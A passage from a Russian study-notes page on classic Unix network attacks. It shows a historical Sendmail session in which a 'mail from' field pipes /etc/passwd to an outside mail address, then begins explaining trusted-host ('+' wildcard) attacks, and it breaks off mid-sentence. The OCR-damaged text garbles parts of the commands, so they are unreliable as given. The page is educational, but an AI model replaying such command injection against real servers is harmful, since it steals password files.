Студопедия.Орг Главная | Случайная страница | Контакты | Мы поможем в написании вашей работы!  
 

Connected to victim.com



Escape character is ' `]'.

220 victim.corn Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04

mail from: "I/bin/mail [email protected] " /etc/passwd"

250 "I/bin/mail [email protected] " /etc/passwd"... Sender ok

rcpt to: nosuchuser

Nosuchuser... User unknown

Data

354 Enter mail, end with ". " on a line by itself

.

Mail accepted quit

Connection closed by foreign host.

evil %

Из примера видно, что все атаки на sendmail идут на уровне

Незарегистрированного удаленного пользователя и поэтому относятся к

Сценарию 1.

Атаки на доверие

Напомним, что типичным (и самым опасным) механизмом, использующим доверие,

Является механизм доверенных хостов, при подключении с которых с помощью

Г-служб можно зарегистрироваться под любым именем, кроме root, без

Указания пароля. Само по себе это уже плохо, так как, вскрыв один из

Хостов, кракер сможет легко по цепочке добраться до следующих. Гораздо

более опасно другое: если система, которую собираются атаковать, содержит

шаблон "+" (в некоторых системах он устанавливается по умолчанию) в

Файлах, где описываются доверенные хосты, то все хосты становятся

Доверенными для данного.

Другие описываемые здесь атаки на доверие также основаны на ненадежной

Аутентификации или ее отсутствии, поэтому все они относятся к типовому





Дата публикования: 2014-11-04; Прочитано: 284 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!



studopedia.org - Студопедия.Орг - 2014-2024 год. Студопедия не является автором материалов, которые размещены. Но предоставляет возможность бесплатного использования (0.006 с)...